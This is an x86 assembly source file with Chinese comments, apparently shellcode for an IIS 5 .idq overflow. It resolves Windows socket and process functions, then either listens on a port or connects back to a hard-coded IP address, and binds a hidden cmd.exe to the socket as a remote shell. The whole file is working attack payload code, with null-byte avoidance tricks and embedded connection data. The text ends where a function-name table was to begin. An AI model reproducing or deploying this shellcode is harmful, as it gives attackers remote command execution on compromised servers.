;//IIS5_idq.asm
.386p
.model flat,c
;//下面定义 连接 信息 结构.
stConnectInfo struct
byConnectType db 0 ;//=1, 监听; =2,连结外部ip/port.
byReserv1 db 1 ;//nothing just for Word Adjusted.
dwReserv1 dw 1 ;//nothing just for Word Adjusted.
dwListenPort dd 0 ;//DDWORD dwIP1+dwIP2;
dwIP1 dd 0 ;// //IP 和端口,一位用2位表示. 高位为类型,低位为值.
dwIP2 dd 0 ;// 1.高位 =1, 低位为普通value.
dwConnectPort dd 0 ;// 2.高位 = 2, 低位 应该 = value -1
stConnectInfo ends
;//用到的函数 结构
SkOverflowFuncAddr struct
TerminateProcess dd 0;
CreatePipe dd 0;
GetStartupInfoA dd 0;
CreateProcessA dd 0;
PeekNamedPipe dd 0;
GlobalAlloc dd 0;
WriteFile dd 0;
ReadFile dd 0;
Sleep dd 0;
ExitProcess dd 0;
GetLastError dd 0;
DuplicateHandle dd 0;
GetCurrentProcess dd 0;
CloseHandle dd 0;
socket dd 0;
bind dd 0;
listen dd 0;
accept dd 0;
send dd 0;
recv dd 0;
setsockopt dd 0;
WSAStartup dd 0;
closesocket dd 0;
connect dd 0;
gethostname dd 0;
SkOverflowFuncAddr ends
STARTUPINFO struct
cb dd 0;
lpReserved dd 0;
lpDesktop dd 0;
lpTitle dd 0;
dwX dd 0;
dwY dd 0;
dwXSize dd 0;
dwYSize dd 0;
dwXCountChars dd 0;
dwYCountChars dd 0;
dwFillAttribute dd 0;
dwFlags dd 0;
wShowWindow dw 0;
cbReserved2 dw 0;
lpReserved2 dd 0;
hStdInput dd 0;
hStdOutput dd 0;
hStdError dd 0;
STARTUPINFO ends
PROCESS_INFORMATION struct
hProcess dd 0;
hThread dd 0;
dwProcessId dd 0;
dwThreadId dd 0;
PROCESS_INFORMATION ends;
;//管套 - 命令交互 结构
Shell_Cmd_Pipe struct
hReadPipe dd 0;
ShellStdoutPipe dd 0;
hWritePipe dd 0;
ShellStdinPipe dd 0;
msocket dd 0;
ProcessInformation PROCESS_INFORMATION <>;
nstartupinfo STARTUPINFO <>;
Shell_Cmd_Pipe ends
SIZE_OF_TEMP_BUFFER equ 0f0h
;//接受,写管套数据结构.
Recv_Write_Socket_Pipe_Data struct
szTemp db SIZE_OF_TEMP_BUFFER dup(0)
dwBreak DD 0
dwTemp DD 0
Recv_Write_Socket_Pipe_Data ends;
SOCKADDR_IN struct
sin_family dw 0;
sin_port dw 0;
sin_addr dd 0;
sin_zero db 8 dup(0);
SOCKADDR_IN ends
SECURITY_ATTRIBUTES struct
nLength DD 0;
lpSecurityDescriptor DD 0;
bInheritHandle DD 0;
SECURITY_ATTRIBUTES ends;
FUNC_PARAM_1 equ [ebp+8]
FUNC_PARAM_2 equ [ebp+0ch]
FUNC_PARAM_3 equ [ebp+10h]
FUNC_PARAM_4 equ [ebp+14h]
FUNC_PARAM_5 equ [ebp+18h]
FUNC_PARAM_6 equ [ebp+1ch]
FUNC_PARAM_7 equ [ebp+20h]
SO_RCVTIMEO equ 1006h ;// receive timeout
SOL_SOCKET equ 0ffffh ;// options for socket level
Shell_Cmd_Pipe_OFFSET equ 3f0h
SkOverflowFuncAddr_OFFSET equ 2d0h
szShellNeedFunc_OFFSET equ 1d0h
.code
public _sk_Bind_ConnectShellCode
public _GetDataSetOffset_Value
start:
_sk_Bind_ConnectShellCode proc
push ebp;
mov ebp, esp;
;//产生 0x800的堆栈 空间.
xor eax,eax;
inc eax;
shl eax, 0bh; //=>0x800
sub esp, eax;
jmp call_back;
nop;
jump_next:
jmp run_actual1;
call_back:
call jump_next;
call_back_Data_Offset:
;//jmp quit_return; //not run here as no necessary.
;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)
_Convert_Add_Sign_To_Null_Sign:
push ebp;
mov ebp, esp;
push edi;
push ecx;
push eax;
push edx;
mov edi, FUNC_PARAM_1; //第1个参数.
mov ecx, FUNC_PARAM_2; //第2个参数.
mov eax, FUNC_PARAM_3; //第3个参数.
mov edx, FUNC_PARAM_4; //第4个参数.
;//重复查找,替换,直到cx = 0
NextAddSign:
repnz scasb;
jcxz Finish_Replace_Add_Sign;
dec edi;
mov byte ptr [edi], dl;
inc ecx;
jmp NextAddSign;
Finish_Replace_Add_Sign:
pop edx;
pop eax;
pop ecx;
pop edi;
pop ebp;
ret;
;//转换eax的long -> ax 标准word.
;//rule: 1.高位 =1, 低位为普通value.
;// 2.高位 = 2, 低位 应该 = value -1
_convert_Sk_Long_To_Ansi_Word:
push ebx;
push ecx;
push edx;
xor edx, edx;
push eax; //低位 ->ebx
pop ebx;
shr ebx, 10h;
push eax; //高位 -> ecx
pop ecx;
_Convert_bx_To_al_Short:
;//处理ebx.
cmp bh, 1;
je _convert_Sk_Long_IsNormal;
dec bl;
_convert_Sk_Long_IsNormal:
mov al, bl;
test edx, edx;
jnz Finish_Convert_Next_Bit;
shl eax, 8;
push ecx;
pop ebx;
inc edx;
jmp _Convert_bx_To_al_Short
Finish_Convert_Next_Bit:
pop edx;
pop ecx;
pop ebx;
ret;
run_actual1:
jmp run_actual2;
;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,
;// char *ShellNeedFuncStr,
;// DWORD dwGetModuleHandleAddr,
;// DWORD dwGetProcAddr)
;
_Get_Overflow_Addr_From_Shell_Func:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_1; //第1个参数
mov esi, FUNC_PARAM_2; //第2个参数
xor ebx,ebx;
xor ecx,ecx;
mov cl,SHELL_NEED_FUNC_BODY_OFFSET;
add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET
mov cl, byte ptr [esi];
inc esi;
_NextDllNameToLoad:
push ecx;
mov bl, byte ptr [esi];
inc esi; //skip size.
push esi;
mov eax, FUNC_PARAM_3; //第3个参数.
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call eax;
add esi, ebx; //go to next address.
;//现在,esi指向 函数 数目.
xor ecx, ecx;
mov cl, byte ptr [esi];
inc esi;
;//现在,load每个function.
_NextFunction_Addr:
push ecx;
;//取字符串的大小
mov bl, byte ptr [esi];
inc esi;
push eax;
push esi;
push esi; //procName
push eax; //module
mov ecx, FUNC_PARAM_4; //第3个参数.
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call ecx;
mov dword ptr [edi], eax;
add edi, 4;
pop esi;
pop eax;
add esi, ebx; //指针移动到下一个字符串.
pop ecx;
loop _NextFunction_Addr;
pop ecx;
loop _NextDllNameToLoad;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
pop ebp;
ret;
run_actual2:
jmp run_actual3_1;
;//创建 一个管套,监听一个端口,返回该管套.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
_Create_Bind_Connect_Socket_To_Port:
push ebp;
mov ebp, esp;
xor eax, eax; //开辟0xff(256)个byte的变量区域.
mov ax, 3f0h
sub esp, eax;
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //第一个参数.
;//WSAStartup(werd,&wsd);
lea edi, [ebp-340h]; //开辟个空间做临时变量.
xor eax, eax;
mov al,2;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.WSAStartup];
call eax;
;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)
xor eax, eax;
push eax;
inc eax;
push eax;
inc eax;
push eax;
mov eax, [esi+SkOverflowFuncAddr.socket];
call eax;
;//取连结类型
mov edx, FUNC_PARAM_2;
lea ebx, [edx+stConnectInfo.byConnectType];
mov cl, BYTE PTR [ebx];
push eax;
;//准备参数 SOCKADDR_IN
lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.
lea ebx, [edi + SOCKADDR_IN.sin_family];
xor eax, eax;
mov al,2;
mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET
pop eax;
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
cmp cl,1 ;//是监听吗?
jne _IsConnectToIP; //no. 跳转.
push eax; // <-2@
;//取得端口value.
push eax; // <-1@
mov eax, [edx+stConnectInfo.dwListenPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
pop eax; // ->1@
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov edx, FUNC_PARAM_2; //第2个参数.
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
xor eax, eax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY
pop eax; // ->2@
push eax; //<-3@
;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));
xor ecx, ecx;
mov cl, size sockaddr_in;
push ecx;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.bind];
call eax;
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1;
run_actual3_1:
jmp run_actual3_2;
_temp_1:
pop eax; //->3@
push eax; //<-4@
;//listen( msocket, 1);
xor ecx, ecx;
inc ecx;
push ecx;
push eax;
mov eax, [esi+SkOverflowFuncAddr.listen];
call eax;
pop eax; //->4@
push eax; //<-5@
;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);
xor ecx, ecx;
mov cl, size sockaddr_in;
lea edi, [ebp-0c0h];
mov [edi], ecx;
push edi; //iLen = sizeof(addrin);
lea edi, [ebp-0f0h];
push edi; //&SOCKADDR_IN 结构.
push eax;
mov eax,[esi+SkOverflowFuncAddr.accept];
call eax;
pop edx; //->5@ //用来listen的socket.由eax->edx
push eax; //<-6@ //得到新的连结管套..
;//关闭 用来 listen的socket.
;//closesocket( msocket);
push edx;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
pop eax; //->6@
cmp eax, -1;
je WSocket_QuitRightNow;
jmp Finish_Get_Connection_Socket;
_IsConnectToIP: ;//连接到一个ip:port
;//addrin.sin_family = AF_INET;
;//addrin.sin_addr.S_un.S_addr = 0x0100007f;
;//addrin.sin_port = 0x8b; //139.
;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));
;//准备参数 SOCKADDR_IN
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
;//取得端口value.
push eax; //<-1@
mov eax, [edx+stConnectInfo.dwConnectPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1_1;
run_actual3_2:
jmp run_actual3;
_temp_1_1:
mov eax, [edx+stConnectInfo.dwIP1];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
shl ecx, 10h;
mov eax, [edx+stConnectInfo.dwIP2];
call _convert_Sk_Long_To_Ansi_Word;
mov cx, ax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2
pop eax; //->1@
push eax; //<-2@
;//connect(msocket, addr, 0x10);
xor ecx, ecx;
mov cl, 10h;
push ecx; //sizeof(SOCKADDR_IN);
push edi; //SOCKADDR *
push eax; //msocket.
mov eax, [esi+SkOverflowFuncAddr.connect];
call eax; //connect.
mov ecx, eax;
pop eax; //->2@
jcxz Finish_Get_Connection_Socket; //connect success.
nop;
;//now, connect failure.
;//closesocket(eax)
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
xor eax, eax;
jmp WSocket_QuitRightNow;
Finish_Get_Connection_Socket:
push eax;
push eax;
pop edx; //edx = eax
;// setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));
lea edi, [ebp-0f0h];
xor eax, eax;
mov al, 1;
mov [edi], eax;
shl eax, 2; //eax = 4
push eax;
push edi;
mov ax, SO_RCVTIMEO;
push eax;
mov ax, SOL_SOCKET;
push eax;
push edx;
mov eax, [esi+SkOverflowFuncAddr.setsockopt];
call eax;
pop eax;
WSocket_QuitRightNow:
;//返回结果.
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual3:
jmp run_actual4_1;
;//在管套 pipe 上,运行进程 pStrCmd;
;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
_Create_Process_To_Handle:
push ebp;
mov ebp, esp;
push edi;
push esi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
push edi;
pop edx; //edx = edi;
;//memset( &si, 0, sizeof(STARTUPINFO));
xor eax, eax;
lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];
push edi; //edi = &STARTUPINFO; ---
xor ecx, ecx;
mov cl, size STARTUPINFO;
rep stosb;
pop edi; // ---
;//si.cb = sizeof(STARTUPINFO);
lea esi, [edi + STARTUPINFO.cb];
mov cl, size STARTUPINFO;
mov [esi], ecx;
;//si.wShowWindow = SW_HIDE = 0; //need to do nothing.
;//si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
lea esi, [edi + STARTUPINFO.dwFlags];
mov cx, 101h;
mov [esi], ecx;
;//si.hStdInput = ShellStdinPipe;
push edi;
lea edi, [edi + STARTUPINFO.hStdInput];
lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;//si.hStdOutput = ShellStdoutPipe;
push edi;
lea edi, [edi+STARTUPINFO.hStdOutput];
lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),
;// &(si.hStdError),DUPLICATE_SAME_ACCESS, TRUE, 0);
mov esi, FUNC_PARAM_1;
mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];
call eax;
xor ecx, ecx;
push ecx; //0
inc ecx;
push ecx; //TRUE
inc ecx;
push ecx; //DUPLICATE_SAME_ACCESS
lea edx, [edi+STARTUPINFO.hStdError];
push edx; //&(si.hStdError)
push eax; //GetCurrentProcess();
push esi;
mov esi, FUNC_PARAM_2;
lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov ebx, [esi];
pop esi;
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_2;
run_actual4_1:
jmp run_actual4;
_temp_2:
push ebx; //ShellStdoutPipe
push eax; //GetCurrentProcess();
mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];
call eax;
;// CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0,
;// NULL, NULL, &si, &ProcessInformation )
xor eax, eax;
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
push edx; ;//&ProcessInformation
lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];
push edx; ;//&si
push eax; ;//NULL;
push eax; ;//NULL;
push eax; ;//0;
inc eax;
push eax; ;//TRUE;
dec eax;
push eax; ;//NULL;
push eax; ;//NULL;
mov edx, FUNC_PARAM_3;
push edx; ;//LPCTSTR lpszCommand.
push eax; ;//NULL;
mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];
call eax;
;//CloseHandle( ShellStdinPipe);
mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//CloseHandle( ShellStdoutPipe);
mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop esi;
pop edi;
mov esp, ebp;
pop ebp;
ret;
;//memset( &si, 0, sizeof(STARTUPINFO));
run_actual4:
jmp run_actual5;
;//关闭不再用的管套
;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Close_All_Communication_Pipe:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1;
mov edi, FUNC_PARAM_2;
;//closesocket(msocket);
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
;//closehandle(handle)..
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//closehandle(handle)..
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual5:
jmp run_actual6_1;
;//接受管套的数据,写进pipe,读pipe,发送到socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Recv_Write_Socket_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov ax, 2f0h;
sub esp, eax; // 496bytes, use for char szTemp[240];
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
;//dwBreak = 1
lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];
xor eax, eax;
inc eax;
mov [edx], eax;
;//while(!bBreak)
_While_Read_Data_Loop:
;//监测 dwBreak == 0?
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];
mov eax, [edx];
test eax, eax;
jz _Quit_While_Read_Data_Loop_1;
;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);
xor eax, eax;
push eax;
mov al, SIZE_OF_TEMP_BUFFER;
push eax;
lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push eax;
lea ebx, [edi+Shell_Cmd_Pipe.msocket];
mov eax, [ebx];
push eax;
mov eax, [esi+SkOverflowFuncAddr.recv];
call eax;
cmp eax, -1;
jne _NextStep_Receive_Test;
push eax;
pop edx;
mov eax, [esi+SkOverflowFuncAddr.GetLastError];
call eax;
cmp ax, 10060; //timeout?
je _Read_StdoutPipe;
_Quit_While_Read_Data_Loop_1:
jmp _Quit_While_Read_Data_Loop; //error.
_NextStep_Receive_Test:
test eax, eax; //eax == 0?
je _Quit_While_Read_Data_Loop; //break;
jng _Read_StdoutPipe;
;//Receive_Ok_Occure:
;//if( iLen > 0)
;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)
xor edx, edx;
push edx; //NULL
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push ebx; //&dwTemp
push eax; //iLen
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push ebx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.WriteFile];
call eax;
test eax, eax;
jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_3;
run_actual6_1:
jmp run_actual6;
_temp_3:
_Read_StdoutPipe:
;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
push eax; //NULL
push eax; //0
push eax; //NULL
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];
call eax;
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
test eax, eax;
jz _No_Data_To_Read_Yet;
;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
mov al, SIZE_OF_TEMP_BUFFER;
push eax; //sizeof(szTemp);
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.ReadFile];
call eax; //ReadFile.
;//if( ReadFile (...) == 0)? then quit.
test eax, eax;
je _Quit_While_Read_Data_Loop;
;//send( newsocket, szTemp, dwTemp, 0);
xor eax, eax;
push eax; //0
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push eax; //dwTemp;
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax; //socket.
mov eax, [esi+SkOverflowFuncAddr.send];
call eax;
cmp eax, -1;
je _Quit_While_Read_Data_Loop;
jmp _Read_StdoutPipe; //continue to read next data.
_No_Data_To_Read_Yet:
jmp _While_Read_Data_Loop;
_Quit_While_Read_Data_Loop:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual6:
jmp run_actual;
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Create_Two_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov al, 0f0h;
sub esp, eax; //开辟空间
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1;
mov edi, FUNC_PARAM_2;
xor ebx,ebx;
lea edi, [ebp-10h];
;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL
lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];
mov [edx], ebx;
;//SecurityAttributes.bInheritHandle = TRUE; //will inherit handle
lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];
inc ebx;
mov [edx], ebx;
;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
lea edx, [edi+SECURITY_ATTRIBUTES.nLength];
mov bl, size SECURITY_ATTRIBUTES;
mov [edx], ebx;
xor ebx, ebx;
;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.
push edi; //save.
push ebx; //0
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov [edx], ebx; //ShellStdoutPipe = 0;
push edx; //&ShellStdoutPipe
lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];
push edx;; //&hReadPipe
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax;
pop edi; //restore.
test eax, eax;
je _Create_Pipe_Quit_Error;
;//Create Second Pipe.
;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);
xor ebx, ebx;
push ebx; //0
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];
push edx; //&hWritePipe
lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
mov [edx],ebx;
push edx; //&ShellStdinPipe
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax;
test eax, eax;
je _Create_Pipe_Quit_Error;
xor eax, eax;
inc eax;
jmp _Create_Pipe_Quit;
_Create_Pipe_Quit_Error:
xor eax, eax;
jmp _Create_Pipe_Quit;
nop;
_Create_Pipe_Quit:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual:
lea esi, [esp];
mov esi, [esi]; //ebx 是调用代码的地址
xor ecx, ecx;
mov cx,MyDataOffset;
add esi, ecx; //esx 是未来 数据的地址.
;//ebp-0x2ff 处,是 szShellNeedFunc结构.
lea edi, [ebp - szShellNeedFunc_OFFSET];
push edi;
;//MyDebugAdd -----
mov cx, _size_AllData;
rep movsb;
;//还要包括 连接信息结构 的数据
pop edi;
push edi;
;//将'+'转换成 "\x00"
;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);
xor ecx, ecx;
push ecx; //---参数4
mov cl, '+';
push ecx; //---参数3
mov cx, _size_szShellNeedFunc;
push ecx; //---参数2
xor ebx, ebx;
mov bl, String_Of_Data_Offset;
add edi, ebx; //edi指向 真正的 szShellNeedFunc
push edi; //---参数1
call _Convert_Add_Sign_To_Null_Sign;
add esp, 10h;
;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)
xor ecx, ecx;
mov cx, _GetModuleHandle_Addr_Offset;
mov esi, edi;
add esi, ecx;
mov eax, [esi+4]
push eax; ;//GetProcAddress_Addr
mov eax, [esi];
push eax; ;//GetModuleHandle_Addr
push edi;
;//ebp-0x1ff处,是 SkOverflowFuncAddr结构.
lea esi, [ebp-SkOverflowFuncAddr_OFFSET];
push esi;
call _Get_Overflow_Addr_From_Shell_Func;
add esp, 10h;
pop edi;
;//创建 一个管套,监听一个端口/连接到一个ip:port,返回该管套.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
push edi;
push esi;
call _Create_Bind_Connect_Socket_To_Port;
add esp, 8;
test eax, eax;
jz Main_Quit_Now; //socket 失败.
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
lea ebx, [edi + Shell_Cmd_Pipe.msocket];
mov [ebx], eax; //保存结果到 msocket中.
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
;//创建2个pipe,用来绑定shell.
push edi;
push esi;
call _Create_Two_Pipe;
add esp, 8;
test eax, eax;
jz Main_Quit_Now;
;//now is ok.
;//在管套 pipe 上,运行进程 pStrCmd;
;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
lea edi, [ebp-szShellNeedFunc_OFFSET];
xor eax,eax;
mov al, String_Of_Data_Offset; //cmd.exe命令行在数据中的偏移.
add edi, eax;
push edi; //"cmd.exe"的指针
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
push edi;
push esi;
call _Create_Process_To_Handle;
add esp, 0ch;
;//接受管套的数据,写进pipe,读pipe,发送到socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Recv_Write_Socket_Pipe;
add esp, 8;
;//关闭不再用的管套
;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Close_All_Communication_Pipe
add esp, 8;
;//关闭该进程
xor eax, eax;
push eax;
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
mov eax, [edx+PROCESS_INFORMATION.hProcess];
push eax;
mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];
call eax;
Main_Quit_Now: ;//现在推出..
;//exit now.
xor eax, eax;
push eax;
mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];
call eax;
ret;
;//quit_return:
;//恢复堆栈
mov esp,ebp;
pop ebp;
nop;
nop;
;//下面是数据:
MyDataOffset equ $-call_back_Data_Offset; //call 函数,到这里的距离.
ConnectTypeOffset equ $-start;
ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;
ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;
ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;
ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;
MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>
String_Of_Data_Offset equ $-MyConnectInfo;
ExecCommandOffset equ $-start;
szShellNeedFunc db 'cmd.exe+++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
;//下面是函数信息.
